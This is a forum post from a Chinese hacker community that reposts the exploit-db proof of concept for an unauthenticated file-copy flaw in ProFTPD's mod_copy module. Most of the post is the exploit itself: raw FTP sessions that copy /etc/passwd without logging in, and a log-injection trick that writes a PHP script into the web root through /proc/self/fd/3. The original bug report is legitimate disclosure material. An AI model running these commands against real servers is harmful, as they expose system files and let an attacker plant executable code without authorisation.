搜索
中国白客联盟»论坛 Techniques 0day及EXP(0day and POC) ProFTPD <=1.3.5 mod_copy 未授权文件复制漏洞 POC
返回列表 发新帖
查看: 217|回复: 0

ProFTPD <=1.3.5 mod_copy 未授权文件复制漏洞 POC

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-4-24 17:53:04 | 显示全部楼层 |阅读模式
From: https://www.exploit-db.com/exploits/36742/
  1. Description TJ Saunders 2015-04-07 16:35:03 UTC
  2. Vadim Melihow reported a critical issue with proftpd installations that use the
  3. mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
  4. to be used by *unauthenticated clients*:

  6. ---------------------------------
  7. Trying 80.150.216.115...
  8. Connected to 80.150.216.115.
  9. Escape character is '^]'.
  10. 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
  11. site help
  12. 214-The following SITE commands are recognized (* =>'s unimplemented)
  13. 214-CPFR <sp> pathname
  14. 214-CPTO <sp> pathname
  15. 214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path
  16. 214-SYMLINK <sp> source <sp> destination
  17. 214-RMDIR <sp> path
  18. 214-MKDIR <sp> path
  19. 214-The following SITE extensions are recognized:
  20. 214-RATIO -- show all ratios in effect
  21. 214-QUOTA
  22. 214-HELP
  23. 214-CHGRP
  24. 214-CHMOD
  25. 214 Direct comments to root@www01a
  26. site cpfr /etc/passwd
  27. 350 File or directory exists, ready for destination name
  28. site cpto /tmp/passwd.copy
  29. 250 Copy successful
  30. -----------------------------------------

  32. He provides another, scarier example:

  34. ------------------------------
  35. site cpfr /etc/passwd
  36. 350 File or directory exists, ready for destination name
  37. site cpto <?php phpinfo(); ?>
  38. 550 cpto: Permission denied
  39. site cpfr /proc/self/fd/3
  40. 350 File or directory exists, ready for destination name
  41. site cpto /var/www/test.php

  43. test.php now contains
  44. ----------------------
  45. 2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
  46. (slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
  47. 2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
  48. (slon-P5Q.lan[192.168.3.193]): FTP session opened.
  49. 2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
  50. (slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php
  51. phpinfo(); ?>' for copying: Permission denied
  52. -----------------------

  54. test.php contains contain correct php script "<?php phpinfo(); ?>" which
  55. can be run by the php interpreter

  57. Source: http://bugs.proftpd.org/show_bug.cgi?id=4169
复制代码
过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表